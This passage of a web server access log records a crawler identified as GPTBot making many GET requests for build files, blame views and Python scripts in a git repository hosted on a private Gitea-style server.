74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31148] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31149] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108405] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13319] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:14:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10917] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:14:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11375] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:14:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11111] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:14:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11104] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:14:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153574] [Gzip 31.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13452] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814856] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:14:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13346] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:14:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19488] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:14:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:14:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:14:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19489] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:14:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:14:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:14:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:14:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12966] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:14:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13478] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:14:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:14:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:14:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12578] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 